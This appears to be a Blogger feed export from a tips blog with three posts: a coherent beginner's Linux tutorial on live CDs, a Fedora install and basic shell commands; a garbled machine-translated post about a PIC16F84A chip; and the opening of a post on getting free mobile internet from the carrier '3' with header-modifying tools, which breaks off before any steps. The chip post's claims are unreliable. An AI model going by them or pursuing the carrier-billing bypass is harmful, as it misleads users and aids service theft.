<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5397170308485192825</id><updated>2012-02-02T08:02:46.688-08:00</updated><title type='text'>Trik and Tips headware software marketing bisnis</title><subtitle type='html'>kumpulan informasi software, handware, marketing bisnis, bisnis online, only ready</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>48</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-6064834995819141162</id><published>2012-02-02T08:02:00.000-08:00</published><updated>2012-02-02T08:02:46.723-08:00</updated><title type='text'>Getting started with Linux for noobs!</title><content type='html'>&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img.blogsolute.com/most-useful-linux-commands.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="272" src="http://img.blogsolute.com/most-useful-linux-commands.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;I. What is Linux?&lt;br /&gt;II. Trying it out&lt;br /&gt;III. Installing&lt;br /&gt;IV. What to do now&lt;br /&gt;V. The Console&lt;br /&gt;&lt;br /&gt;Intro:&lt;br /&gt;This tutorial is written with the total Linux n00b in mind.&lt;br /&gt;I've seen too many n00bs get totally left in the dark by asking what&lt;br /&gt;the best distro is. They seem to only get flooded with too many&lt;br /&gt;answers in so short a time. I'm a little bit of a n00b too, so I know&lt;br /&gt;how it feels. I will cover a grand total of two basic distros. You may&lt;br /&gt;learn to strongly prefer other ones (I do!) but this is just to get&lt;br /&gt;you started. I touch on a number of topics that would be impossible to&lt;br /&gt;go into in depth in one tutorial, so I encourage you to actively seek&lt;br /&gt;out more about the concepts I make reference to.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I. What is &lt;b&gt;Linux&lt;/b&gt;?&lt;br /&gt;&lt;br /&gt;Linux is basically an operating system (&lt;b&gt;OS &lt;/b&gt;for short). The &lt;b&gt;Windows&lt;/b&gt;&lt;br /&gt;machine you're (probably) using now uses the Mcft Windows&lt;br /&gt;operating system.&lt;br /&gt;&lt;br /&gt;Ok, so what's so different about Linux?&lt;br /&gt;&lt;br /&gt;Linux is part of a revolutionary movement called the open-source&lt;br /&gt;movement. The history and intricacies of that movement are well beyond&lt;br /&gt;the scope of this tutorial, but I'll try and explain it simply. Open&lt;br /&gt;source means that the developers release the source code for all their&lt;br /&gt;customers to view and alter to fit what they need the software to do,&lt;br /&gt;what they want the software to do, and what they feel software should&lt;br /&gt;do. Linux is a programmer?s dream come true, it has the best compilers,&lt;br /&gt;libraries, and tools in addition to its being open-source. A&lt;br /&gt;programmer's only limit then, is his knowledge, skill, time, and&lt;br /&gt;resolve.&lt;br /&gt;&lt;br /&gt;What is a distro?&lt;br /&gt;&lt;br /&gt;A distro is short for a distribution. It's someone's personal&lt;br /&gt;modification or recreation of Linux.&lt;br /&gt;&lt;br /&gt;What do you mean by distros? I just want Linux!&lt;br /&gt;&lt;br /&gt;Since Linux is open source, every developer can write his own version.&lt;br /&gt;Most of those developers release their modifications, or entire&lt;br /&gt;creations as free and open source. A few don't and try to profit from&lt;br /&gt;their product, which is a topic of moral debate in the Linux world.&lt;br /&gt;The actual Linux is just a kernel that serves as a node of&lt;br /&gt;communication between various points of the system (such as the CPU,&lt;br /&gt;the mouse, the hard drive etc.). In order to use this kernel, we must&lt;br /&gt;find a way to communicate with it. The way we communicate is with a&lt;br /&gt;shell. Shells will let us enter commands in ways that make sense to&lt;br /&gt;us, and send those commands to the kernel in ways that makes sense to&lt;br /&gt;it. The shell most Linux's use it the BASH shell (Bourne Again SHell).&lt;br /&gt;The kernel by itself will not do, and just a shell on top of the kernel&lt;br /&gt;won?t either for most users; we are then forced to use a distribution.&lt;br /&gt;&lt;br /&gt;What distro is best?&lt;br /&gt;&lt;br /&gt;This is not the question you want to ask a large number of people at&lt;br /&gt;one time. This is very much like asking what kind of shoe is best,&lt;br /&gt;you'll get answers anywhere from running shoes, hiking boots, cleats,&lt;br /&gt;to wingtips. You need to be specific about what you plan on using&lt;br /&gt;Linux for, what system you want to use it on, and many other things. I&lt;br /&gt;will cover two that are quick and easy to get running. They may not be&lt;br /&gt;the best, or the quickest, or the easiest, or the most powerful, but&lt;br /&gt;this is a guide for getting started, and everyone has to start&lt;br /&gt;somewhere.&lt;br /&gt;&lt;br /&gt;How much does it cost?&lt;br /&gt;&lt;br /&gt;computer + electricity + internet + CD burner and CDs = Linux&lt;br /&gt;I'll let you do your own math.&lt;br /&gt;Note however that a few do charge for their distros, but they aren't&lt;br /&gt;all that common, and can be worked around. Also, if you lack internet&lt;br /&gt;access or a CD burner or CDs or you just want to, you can normally&lt;br /&gt;order CDs of the distro for a few dollars apiece.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;II. Trying it out.&lt;br /&gt;&lt;br /&gt;Wouldn't it stink if you decide to wipe out your hard drive and install&lt;br /&gt;Linux as the sole operating system only to learn that you don't know&lt;br /&gt;how to do anything and hate it? Wouldn?t it be better to take a test&lt;br /&gt;drive? 95 out of a 100 of you know where I'm heading with this section&lt;br /&gt;and can therefore skip it. For those of you who don't know, read on.&lt;br /&gt;&lt;br /&gt;There are many distros, and most distros try to have something that&lt;br /&gt;makes them stand out. Knoppix was the first live-CD distro. Although&lt;br /&gt;most of the other main distros have formed their own live-CDs, Knoppix&lt;br /&gt;is still the most famous and I will be covering how to acquire it.&lt;br /&gt;&lt;br /&gt;A live-CD distro is a distribution of Linux in which the entire OS can&lt;br /&gt;be run off of the CD-ROM and your RAM. This means that no installation&lt;br /&gt;is required and the distro will not touch your hard disk or current OS&lt;br /&gt;(unless you tell it to). On bootup, the CD will automatically detect&lt;br /&gt;your hardware and launch you into Linux. To get back to Windows, just&lt;br /&gt;reboot and take the CD out.&lt;br /&gt;&lt;br /&gt;Go to the Knoppix website (www.knoppix.com). Look around some to get&lt;br /&gt;more of an idea on what Knoppix is. When you're ready, click Download.&lt;br /&gt;You'll be presented with a large amount of mirrors, some of which have&lt;br /&gt;ftp and some of which have http also.&lt;br /&gt;&lt;br /&gt;note: the speed of the mirrors vary greatly, and you may want to&lt;br /&gt;change mirrors should your download be significantly slow.&lt;br /&gt;&lt;br /&gt;Choose a mirror. Read the agreement and choose accept. You'll probably&lt;br /&gt;want to download the newest version and in your native language (I'll&lt;br /&gt;assume English in this tutorial). So choose the newest file ending in&lt;br /&gt;-EN.iso&lt;br /&gt;&lt;br /&gt;note: you might want to also verify the md5 checksums after the&lt;br /&gt;download, if you don't understand this, don't worry too much. You just&lt;br /&gt;might have to download it again should the file get corrupted (you'll&lt;br /&gt;have to anyway with the md5). Also, a lot of times a burn can be&lt;br /&gt;botched for who-knows what reason. If the disk doesn?t work at all,&lt;br /&gt;try a reburn.&lt;br /&gt;&lt;br /&gt;Once the .iso file is done downloading, fire up your favorite&lt;br /&gt;CD-burning software. Find the option to burn a CD image (for Nero, this&lt;br /&gt;is under copy and backup) and burn it to a disk. Make sure you don't&lt;br /&gt;just copy the .iso, you have to burn the image, which will unpack all&lt;br /&gt;the files onto the CD.&lt;br /&gt;&lt;br /&gt;Once the disk is done, put it in the CD-ROM drive and reboot the&lt;br /&gt;computer. While your computer is booting, enter CMOS (how to get to&lt;br /&gt;CMOS varies for each computer, some get to it by F1 or F2 or F3, etc.)&lt;br /&gt;Go to the bootup configuration and place CD-ROM above hard disk. Save&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;changes and exit. Now, Knoppix will automatically start. You will be&lt;br /&gt;presented with a boot prompt. Here you can input specific boot&lt;br /&gt;parameters (called cheatcodes), or just wait and let it boot up using&lt;br /&gt;the default.&lt;br /&gt;&lt;br /&gt;note: Sometimes USB keyboards do not work until the OS has somewhat&lt;br /&gt;booted up. Once you?re actually in Knoppix, your USB keyboard should&lt;br /&gt;work, but you may not be able to use cheatcodes. If you need to,&lt;br /&gt;attach a PS/2 keyboard temporarily. Also, if a particular aspect of&lt;br /&gt;hardware detection does not work, look for a cheatcode to disable it.&lt;br /&gt;Cheatcodes can be found on the Knoppix website in text format (or in&lt;br /&gt;HTML at www.knoppix.net/docs/index.php/CheatCodes).&lt;br /&gt;&lt;br /&gt;Upon entering the KDE desktop environment, spend some time exploring&lt;br /&gt;around. Surf the web, get on IM, play some games, explore the&lt;br /&gt;filesystem, and whatever else seems interesting. When your done, open&lt;br /&gt;up the console (also called terminal, xterm, konsole, or even shell)&lt;br /&gt;and get ready for the real Linux. See section V for what to do from&lt;br /&gt;here.&lt;br /&gt;&lt;br /&gt;note: to function as root (or the superuser) type su.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;It's not entirely necessary that you are a console wizard at this point&lt;br /&gt;(although you will need to be sooner or later), but a little messing&lt;br /&gt;around wont hurt.&lt;br /&gt;&lt;br /&gt;Just as there are many Linux distros, so there are also many types of&lt;br /&gt;Knoppix. I won?t go into using any of them, but they should all be&lt;br /&gt;somewhat similar. Some of them include: Gnoppix, Knoppix STD, Morphix,&lt;br /&gt;and PHLAK. Other distros also have live-CDs.&lt;br /&gt;&lt;br /&gt;III. Installing&lt;br /&gt;&lt;br /&gt;I will guide you through the installation of Fedora Core 2. The reason&lt;br /&gt;I chose Fedora is because it contains the Anaconda installer, which is&lt;br /&gt;a very easy installer.&lt;br /&gt;&lt;br /&gt;Download the discs from here:&lt;br /&gt;http://download.fedora.redhat.com/pub/fedo...ore/2/i386/iso/&lt;br /&gt;If the link doesn?t work, then go to www.redhat.com and navigate your&lt;br /&gt;way to downloading Fedora (odds are your architecture is i386).&lt;br /&gt;You will want to download the FC2-i386-disc1.iso and burn it using the&lt;br /&gt;method for Knoppix. Do the same for all the discs.&lt;br /&gt;&lt;br /&gt;Note: do NOT download the FC2-i386-SRPMS-disc1.iso files.&lt;br /&gt;&lt;br /&gt;Now, once you?re ready, insert disc 1 into the drive and reboot.&lt;br /&gt;&lt;br /&gt;The installer should come up automatically (if not, then see the&lt;br /&gt;Knoppix section on &lt;b&gt;CMOS&lt;/b&gt;).&lt;br /&gt;&lt;br /&gt;Note: installer may vary depending on version. Follow directions best&lt;br /&gt;you can using your best judgement.&lt;br /&gt;&lt;br /&gt;1. Language: choose English and hit enter&lt;br /&gt;2. Keyboard: choose us (probably) and hit enter&lt;br /&gt;3. Installation media: choose local CDROM (probably) and hit enter&lt;br /&gt;4. CD test: you can choose to test or skip&lt;br /&gt;5. Intro: click next&lt;br /&gt;6. Monitor: choose your monitor to the best of your ability, if you?re unsure, choose on of the generic ones&lt;br /&gt;7. Installation type: choose which ever you want (default should be fine)&lt;br /&gt;8. Partition: choose to automatically partition (unless you know what you?re doing)&lt;br /&gt;9. Partition: the default partitions should suffice&lt;br /&gt;10. Boot loader: choose your boot loader (grub for default)&lt;br /&gt;11. Network settings: choose the correct settings for your network (generally, don?t mess with anything unless you know what you?re doing)&lt;br /&gt;12. Firewall: you can choose a firewall if you want to&lt;br /&gt;13. Language support: choose any additional language support you want&lt;br /&gt;14. Time zone: pick your time zone&lt;br /&gt;15. Root password: set your root password (root is the admin, or superuser; you want it to be very secure)&lt;br /&gt;16. Packages: choose which packages you want to install. For hard drives over 10 gigs, you can go ahead and choose all&lt;br /&gt;packages (depending on how much disk space you plan on taking up later, note that most everything you?ll need is a package: the exception&lt;br /&gt;being large media files). You will generally want to install all the packages you think you?ll ever need. Two desktop environments aren?t necessary.&lt;br /&gt;Make sure you have at least one and the X window system! (if you want a GUI that is). I suggest you get all the servers too.&lt;br /&gt;&lt;br /&gt;Note: Knoppix uses the KDE Desktop environment&lt;br /&gt;&lt;br /&gt;17. Make sure everything is all right, and install&lt;br /&gt;18. You can create a boot disk if you want&lt;br /&gt;&lt;br /&gt;Note: Desktop environments might have a set-up once you enter them&lt;br /&gt;&lt;br /&gt;IV What to do now&lt;br /&gt;&lt;br /&gt;Now that you have a Linux set-up and running, there are many paths you&lt;br /&gt;can head down. First, you should explore your GUI and menus. Browse&lt;br /&gt;the web with Mozilla, get on IM with GAIM, play games, add/delete&lt;br /&gt;users, check out OpenOffice, and anything else that might be part of&lt;br /&gt;your daily use. Also, set up a few servers on your computer to play&lt;br /&gt;around with, specifically SMTP (*wink*wink*), FTP (vsftp is a good&lt;br /&gt;one), and either telnet or SSH (OpenSSH is a good one). The setup and&lt;br /&gt;use of these are beyond the scope of this tutorial, but researching&lt;br /&gt;them could prove to be very educational.&lt;br /&gt;&lt;br /&gt;The filesystem&lt;br /&gt;The Linux (and Unix) filesystem is different from the normal Windows&lt;br /&gt;that you?re used to. In Windows, your hard drive is denoted ?C:\? (or&lt;br /&gt;whatever). In Linux, it is called the root directory and is denoted&lt;br /&gt;?/?. In the / directory, there are several default folders, including&lt;br /&gt;dev (device drivers) mnt (mount) bin (binaries) usr (Unix System&lt;br /&gt;Resources) home, etc, and others. I encourage you to explore around&lt;br /&gt;the whole file system (see section V) and research more.&lt;br /&gt;&lt;br /&gt;Once you are well situated, it?s time to get into the heart and power&lt;br /&gt;of Linux: the console. The next session will guide you through it and&lt;br /&gt;set you on the path to finding out how to do stuff for yourself. You&lt;br /&gt;will (probably) want to start learning to rely less and less on the&lt;br /&gt;GUI and figure out how to do everything through the console (try&lt;br /&gt;launching all your programs from the console, for example).&lt;br /&gt;&lt;br /&gt;V. The Console&lt;br /&gt;&lt;br /&gt;The Console might look familiar to DOS if you?ve ever used it. The&lt;br /&gt;prompt should look something like the following:&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost avathartri$&lt;br /&gt;&lt;br /&gt;With the blinking _ following it. This can vary greatly as it is fully&lt;br /&gt;customizable. Let?s get started with the commands.&lt;br /&gt;&lt;br /&gt;First, let?s explore the file system. The command ls will "list" the&lt;br /&gt;files in the current directory. Here?s an example:&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost avathartri$ ls&lt;br /&gt;&lt;br /&gt;It should then display the contents of the current directory if there&lt;br /&gt;are any. Almost all commands have options attached to them. For&lt;br /&gt;example, using the -l option, which is short for "long" will display&lt;br /&gt;more information about the files listed.&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost avathartri$ ls -l&lt;br /&gt;&lt;br /&gt;We will get into how to find out the options for commands and what&lt;br /&gt;they do later.&lt;br /&gt;&lt;br /&gt;The second command to learn will be the cd command, or "change&lt;br /&gt;directory". To use it, you type cd followed by a space and the&lt;br /&gt;directory name you wish to go into. In Linux, the top directory is /&lt;br /&gt;(as opposed to C:\ in Windows). Let?s get there by using this command:&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost avathartri$ cd /&lt;br /&gt;AvatharTri@localhost /$&lt;br /&gt;&lt;br /&gt;Now, we are in the top directory. Use the ls command you learned&lt;br /&gt;earlier to see everything that?s here. You should see several items,&lt;br /&gt;which are directories. Now, let?s go into the home directory:&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost /$ cd home&lt;br /&gt;AvatharTri@localhost home$&lt;br /&gt;&lt;br /&gt;And you can now ls and see what?s around. In Linux there are some&lt;br /&gt;special symbol shortcuts for specific folders. You can use these&lt;br /&gt;symbols with cd, ls, or several other commands. The symbol ~ stands&lt;br /&gt;for your home folder. One period . represents the directory your&lt;br /&gt;currently in. Two periods .. represent the directory immediately above&lt;br /&gt;your own. Here?s an example of the commands:&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost home$ cd ~&lt;br /&gt;AvatharTri@localhost avathartri$&lt;br /&gt;&lt;br /&gt;This moved us to our user?s personal directory.&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost avathartri$ cd .&lt;br /&gt;AvatharTri@localhost avathartri$ cd ..&lt;br /&gt;AvatharTri@localhost home$&lt;br /&gt;&lt;br /&gt;The cd .. moved us up to the home directory.&lt;br /&gt;As you?ve probably noticed by now, the section behind the prompt&lt;br /&gt;changes as you change folders, although it might not always be the&lt;br /&gt;case as it?s up to the personal configuration.&lt;br /&gt;&lt;br /&gt;You can use these symbols with the ls command also to view what is in&lt;br /&gt;different folders:&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost home$ ls ~&lt;br /&gt;AvatharTri@localhost home$ ls ..&lt;br /&gt;&lt;br /&gt;And you can view what is in a folder by specifying its path:&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost home$ ls /&lt;br /&gt;AvatharTri@localhost home$ ls /home&lt;br /&gt;&lt;br /&gt;The last command we will cover as far as finding your way around the&lt;br /&gt;filesystem is the cat command. The cat command will show the contents&lt;br /&gt;of a file. Find a file by using the cd and ls commands and then view&lt;br /&gt;its contents with the cat command.&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost home$ cd [directory]&lt;br /&gt;AvatharTri@localhost [directory]$ ls&lt;br /&gt;AvatharTri@localhost [directory]$ cat [filename]&lt;br /&gt;&lt;br /&gt;Where [directory] is the directory you want to view and [filename] is&lt;br /&gt;the name of the file you want to view. Omit the brackets. Now, if the&lt;br /&gt;file you viewed was a text file, you should see text, but if it wasn?t,&lt;br /&gt;you might just see jumbled garbage, but this is ok. If the file goes&lt;br /&gt;by too fast and goes off the screen, don?t worry, we will get to how&lt;br /&gt;to scroll through it later.&lt;br /&gt;&lt;br /&gt;One of the most useful commands is the man command, which displays the&lt;br /&gt;"manual" for the command you want to know more about. To learn more&lt;br /&gt;about the ls command:&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost home$ man ls&lt;br /&gt;&lt;br /&gt;And you will see the manual page for ls. It displays the syntax, a&lt;br /&gt;description, options, and other useful tidbits of information. Use the&lt;br /&gt;up and down arrows to scroll and press q to exit. You can view the&lt;br /&gt;manual pages for any command that has one (most commands do). Try this&lt;br /&gt;out with all the commands that you know so far:&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost home$ man cd&lt;br /&gt;AvatharTri@localhost home$ man cat&lt;br /&gt;AvatharTri@localhost home$ man man&lt;br /&gt;&lt;br /&gt;One very crucial option to the man command is the -k option. This will&lt;br /&gt;search the descriptions of manual pages for the word you specify. You&lt;br /&gt;can use this to find out what command to do what you need to do. For&lt;br /&gt;example, let?s say we want to use a text editor:&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost home$ man -k editor&lt;br /&gt;&lt;br /&gt;And you should see a list of apps with a short description and the&lt;br /&gt;word "editor" in the description.&lt;br /&gt;&lt;br /&gt;With a blank prompt, you can hit tab twice for Linux to display all&lt;br /&gt;the possible commands. For Linux to display all the commands beginning&lt;br /&gt;with a certain letter or series of letters, type those letters and hit&lt;br /&gt;tab twice.&lt;br /&gt;&lt;br /&gt;Note: This is actually a function of BASH and not Linux, but BASH is&lt;br /&gt;the default Linux shell.&lt;br /&gt;&lt;br /&gt;Now that you know a little about moving around the filesystem and&lt;br /&gt;viewing manual pages, there is one more trick that we will cover to&lt;br /&gt;help you out. Remember how the man pages were scrollable as in you&lt;br /&gt;could use the arrow keys to scroll up and down? That is because the&lt;br /&gt;man pages use something called the less pager. We?re not going to go&lt;br /&gt;into what this does exactly and how it works, but that?s definitely&lt;br /&gt;something that you will want to look up. Here?s how to use the less&lt;br /&gt;pager with a file:&lt;br /&gt;&lt;br /&gt;AvatharTri@localhost home$ cat [filename] | less&lt;br /&gt;&lt;br /&gt;That uses something called a pipe. The line is the vertical line above&lt;br /&gt;enter on your keyboard. Briefly, what this does is take the output&lt;br /&gt;from the cat command, and stick it in the less pager. By doing this,&lt;br /&gt;you can view files that would normally run off the screen and scroll&lt;br /&gt;up and down.&lt;br /&gt;&lt;br /&gt;Some final commands to check out:&lt;br /&gt;&lt;br /&gt;mkdir - make directories&lt;br /&gt;cp - copy file&lt;br /&gt;mv - move file&lt;br /&gt;rm - remove file&lt;br /&gt;rmdir - remove directory&lt;br /&gt;grep - search a file for a keyword&lt;br /&gt;pwd - display current working directory&lt;br /&gt;top - display system resources usage (kill the program with control + c)&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-6064834995819141162?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/6064834995819141162/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2012/02/getting-started-with-linux-for-noobs.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/6064834995819141162'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/6064834995819141162'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2012/02/getting-started-with-linux-for-noobs.html' title='Getting started with Linux for noobs!'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-4724837582892873346</id><published>2012-01-30T16:17:00.000-08:00</published><updated>2012-01-30T16:47:06.038-08:00</updated><title type='text'>posting long year 2011(IC PIC16F84A - 207P)</title><content type='html'>&lt;a href="http://www.electronicecircuits.com/wp-content/uploads/2009/11/pic-16f84a-pic16f84-pic-microcontroller.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 328px; height: 328px;" src="http://www.electronicecircuits.com/wp-content/uploads/2009/11/pic-16f84a-pic16f84-pic-microcontroller.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: -webkit-auto;"&gt;sorry guys, long enough do not posting, to &lt;b&gt;1000trik.blogspot.com&lt;/b&gt;, I work serious to business, so I do not care of this first blog, I the new issue provide a review of circuit components.&lt;/div&gt;&lt;div style="text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: -webkit-auto;"&gt;okey we Started circuit components &lt;b&gt;PIC16F84A - 207P&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: -webkit-auto;"&gt;one component than can make anything, I shared directl y to this media,from my test done with 3 &lt;b&gt;resistors&lt;/b&gt; to only join at times to pin tail 6 and 8,requiring the use of &lt;b&gt;transistors&lt;/b&gt; type &lt;b&gt;2N41201&lt;/b&gt; 2 seed, with sufficient &lt;b&gt;power supply battery&lt;/b&gt; for 5 - 6 V, can make its  own stroge RAM duplicate Inject so a layout drawing to picture do not,still waiting on my test&lt;span  &gt; before in posting view tag.&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: -webkit-auto;"&gt;&lt;span  &gt;I sorry Postinger writer for of forgetting.&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-4724837582892873346?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/4724837582892873346/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2012/01/posting-long-year-2011ic-pic16f84a-207p.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4724837582892873346'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4724837582892873346'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2012/01/posting-long-year-2011ic-pic16f84a-207p.html' title='posting long year 2011(IC PIC16F84A - 207P)'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-4008698682831507475</id><published>2011-02-16T08:26:00.000-08:00</published><updated>2012-01-30T16:49:30.158-08:00</updated><title type='text'>Internet Free three</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_KpkJZUIPOWs/TLR6GM27fjI/AAAAAAAAAA8/KowT6mrrrhA/s1600/three_sonybmg_crave1.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 177px; height: 177px;" src="http://3.bp.blogspot.com/_KpkJZUIPOWs/TLR6GM27fjI/AAAAAAAAAA8/KowT6mrrrhA/s1600/three_sonybmg_crave1.jpg" alt="" border="0"&gt;&lt;/a&gt;&lt;br /&gt;&lt;font id="result_box" class="" lang="en"&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;trik there is&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;free internet&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;use&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;card&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;tricks&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;3&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;...&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;This&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;was actually&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;old&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;tricks&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;..&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;uda&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;long&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;dead&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;but&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;a few&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;weeks&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;ago&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;pas&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;ane&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;try&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;again&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;turned&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;cohabited&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;again&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;..&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;there are&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;2&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;alternatives&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;this trick&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;...&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;1&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;pake&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;proxomitron&lt;/font&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;2&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;pake&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;modify&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;header&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;addons&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;the&lt;/font&gt; &lt;font title="Klik untuk terjemahan alternatif" class="hps"&gt;pake&lt;/font&gt; &lt;font title="Klik 